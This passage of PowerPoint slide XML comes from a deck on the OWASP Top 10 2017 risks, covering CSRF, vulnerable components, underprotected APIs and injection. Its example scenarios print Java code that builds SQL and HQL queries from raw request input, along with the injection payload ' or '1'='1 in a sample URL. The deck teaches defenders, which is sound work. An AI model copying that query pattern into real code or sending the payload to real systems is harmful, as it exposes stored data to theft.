              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="6692655"/>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algn="l" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. Such an attack allows the attacker to force a victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="6616181"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A8 – Cross-Site Request Forgery (CSRF)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Freeform 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="7495636"/>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1000" dirty="0"/>
                <a:t>Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>pplications and APIs </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>using components with known vulnerabilities may undermine application defenses and enable </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>various </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>attacks and impacts. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Freeform 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="7419162"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A9 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>– Using Components with Known </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>Vulnerabilities</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Freeform 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="8298617"/>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1000" dirty="0"/>
                <a:t>Modern applications </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>often </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>involve rich client </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>applications and APIs, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>such as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>JavaScript </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>etc.). </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>These APIs are often unprotected and contain numerous </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>vulnerabilities.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Freeform 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="8222143"/>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i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A10 – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Underprotected</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>  APIs</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10 Application Security Risks – 2017 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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smtClean="0"/>
              <a:t>T10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10375274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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="577355349"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957457"/>
          <a:ext cx="6858000" cy="2529546"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="642743">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r>
              <a:tr h="383569">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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b="1" dirty="0" smtClean="0"/>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>COMMON</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="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t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t>AVERAGE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t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0"/>
                        <a:t>SEVERE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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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490563">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anyone who can send untrusted </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>data to the system,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> including external users, business partners, other systems, internal users, and administrators.</a:t>
                      </a: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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> send simple text-based attacks that exploit the syntax of the targeted interpreter. Almost any source of data can be an injection vector, including internal sources.</a:t>
                      </a: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1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> occur when an application sends untrusted data to an interpreter. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Injection flaws are very prevalent, particularly in legacy code.  They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, expression languages, etc. Injection flaws are easy to discover when examining code, but frequently hard to discover via testing. Scanners and fuzzers can help attackers find injection flaws.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</a:t>
                      </a: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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the business value of the affected data and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the platform running the interpreter. All data could be stolen, modified, or deleted.  Could your reputation be harmed?</a:t>
                      </a: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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189"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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: An application uses untrusted data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SQL call:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  custID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" + request.getParameter("id") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Similarly, an application’s blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust in frameworks may result in queries that are still vulnerable, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hibernate Query Language (HQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HQLQuery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("FROM accounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>custID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" + request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In both cases, the attacker modifies the ‘id’ parameter value in her browser to send:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. For example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountView?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This changes the meaning of both queries to return all the records from the accounts table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  More dangerous attacks could modify data or even invoke stored procedures.</a:t>
            </a:r>
          </a:p>
